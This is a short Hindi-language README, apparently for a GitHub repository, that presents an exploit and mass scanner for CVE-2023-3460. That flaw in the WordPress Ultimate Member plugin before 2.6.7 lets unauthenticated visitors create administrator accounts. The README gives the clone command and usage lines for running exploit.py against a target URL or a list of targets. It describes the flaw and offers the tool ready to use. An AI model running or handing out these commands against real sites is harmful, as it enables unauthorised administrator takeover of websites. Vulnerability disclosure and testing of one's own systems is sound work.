
CVE-2023-3460 के लिए शोषण और स्कैनर, एक WordPress Ultimate Member प्लगइन विशेषाधिकार वृद्धि भेद्यता जो अप्रमाणित व्यवस्थापक खाता निर्माण की अनुमति देती है।
अल्टीमेट मेंबर वर्डप्रेस प्लगइन 2.6.7 से पहले आगंतुकों को मनमानी क्षमताओं के साथ उपयोगकर्ता खाते बनाने से नहीं रोकता है, जिससे हमलावरों को स्वेच्छा से प्रशासक खाते बनाने की प्रभावी रूप से अनुमति मिलती है। यह स्क्रिप्ट इस भेद्यता के लिए एक एक्सप्लॉइट निष्पादित करती है और विभिन्न लक्ष्यों को स्कैन करती है, इस भेद्यता की तलाश करती है।
git clone https://github.com/diego-tella/CVE-2023-3460/
cd CVE-2023-3460/
python exploit.py
python exploit.py -t http://target.com/wordpress #basic usage
python exploit.py -c -l list.txt #scan a list of targets